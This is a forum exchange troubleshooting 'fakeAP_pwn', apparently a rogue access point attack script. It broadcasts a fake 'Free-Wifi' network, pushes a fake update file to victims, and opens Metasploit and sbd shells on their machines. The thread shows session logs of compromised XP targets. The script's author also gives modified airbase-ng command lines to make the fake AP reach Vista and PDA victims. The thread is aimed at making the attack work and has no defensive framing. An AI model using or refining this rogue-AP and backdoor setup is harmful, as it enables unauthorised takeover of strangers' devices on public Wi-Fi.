
Originally Posted by
parrotface
just tried beta88 as downloaded
XP sp2 box connects No problem
run the download and metersploit window shows -- sending stage to 10.0.0.151
main script window shows "waiting for target to run update file "
changed default to "sbd" now the metasploit window shows
Session ID 1 (10.0.0.1:4564 -> 10.0.0.151:3386) processing AutoRunScript '/tmp/fakeAP_pwn.rb'
SBD window stays blank
Vista Box won't connect to Free-Wifi -- max signal strength showing -- moved to another room to reduce signal strength, still won't connect.
PDA won't connect either
Any Ideas many thanks
Okay, so its the metasploit stage thats failing...
Ill give it a try later.
With the Vista/PDA, if you edit line 1333
Code:
command="airbase-ng -a $macAddress -W 0 -c $fakeAPchannel -e \"$ESSID\""
Could you replace it with either:
Code:
command="airbase-ng -a $macAddress -c $fakeAPchannel -e \"$ESSID\""
(so -W is removed)
Code:
command="airbase-ng -W 0 -c $fakeAPchannel -e \"$ESSID\""
(so -a is removed)
Code:
command="airbase-ng -c $fakeAPchannel -e \"$ESSID\""
(so -a & -w is removed)